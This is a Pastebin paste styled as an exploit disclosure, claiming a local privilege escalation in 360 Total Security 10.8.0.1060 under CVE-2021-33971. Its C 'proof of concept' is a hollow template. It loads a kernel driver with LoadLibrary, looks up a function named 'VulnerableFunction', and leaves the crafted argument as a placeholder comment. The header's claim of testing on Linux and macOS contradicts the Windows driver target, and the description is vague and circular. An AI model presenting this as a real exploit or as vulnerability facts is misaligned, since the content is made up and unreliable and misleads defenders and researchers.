Advertisement
memorycorruptor

CVE-2021-33971

Feb 2nd, 2023 (edited)
479
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.59 KB | None | 0 0
  1. # Exploit Title: 360 Total Security 10.8.0.1060 Local Privilege Escalation
  2. # Google Dork: N/A
  3. # Date: 2021-05-11
  4. # Exploit Author: youtube.com/@memorycorruptor
  5. # Vendor Homepage: http://www.360totalsecurity.com/
  6. # Version: 360 Total Security 10.8.0.1060
  7. # Tested on: Windows x64 / Linux Debian x64 / MacOS
  8. # CVE: CVE-2021-33971
  9. # PoC Video: https://www.youtube.com/@memorycorruptor/videos
  10. # Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
  11. ---------------------------------------------------------------------------
  12. Elevation of Privilege (EOP) Vulnerability in 360 Total Security 10.8.0.1060
  13.  
  14. A Local Privilege Escalation vulnerability in 360 Total Security 10.8.0.1060, which allows the antivirus software to execute actions with system-level privileges while running under standard user privileges, The vulnerability is similar to a Windows kernel vulnerability discovered in 2021.
  15.  
  16. Introduction
  17. 360 Total Security 10.8.0.1060 is an antivirus software that provides protection against various threats. A recently discovered LPE/EOP vulnerability in the software allows it to perform actions with system-level privileges while running under standard user privileges. This article analyzes this vulnerability and provides a PoC to demonstrate the exploit.
  18.  
  19. Vulnerability
  20. The LPE/EOP vulnerability in 360 Total Security 10.8.0.1060 is similar to a Windows kernel vulnerability discovered in 2021. It allows the antivirus software to perform actions with system-level privileges, bypassing the usual security checks in Windows. This can lead to unauthorized access, data theft, or other malicious actions.
  21.  
  22. Proof of Concept
  23.  
  24. #include <Windows.h>
  25. #include <stdio.h>
  26.  
  27. int main() {
  28. // Load the vulnerable driver
  29. HMODULE hDriver = LoadLibrary("360TotalSecurity.sys");
  30. if (!hDriver) {
  31. printf("Failed to load driver: %d\n", GetLastError());
  32. return 1;
  33. }
  34.  
  35. // Get address
  36. FARPROC pVulnFunc = GetProcAddress(hDriver, "VulnerableFunction");
  37. if (!pVulnFunc) {
  38. printf("Failed to get function address: %d\n", GetLastError());
  39. FreeLibrary(hDriver);
  40. return 1;
  41. }
  42.  
  43. // Exploit code
  44.  
  45. pVulnFunc(/* Crafted argument */);
  46.  
  47.  
  48. FreeLibrary(hDriver);
  49. return 0;
  50. }
  51.  
  52. the vulnerable driver (360TotalSecurity.sys) and retrieves the address of the vulnerable function. The exploit code should be placed where indicated, and the vulnerable function should be called with a crafted argument to trigger the LPE/EOP vulnerability.
  53. ---------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement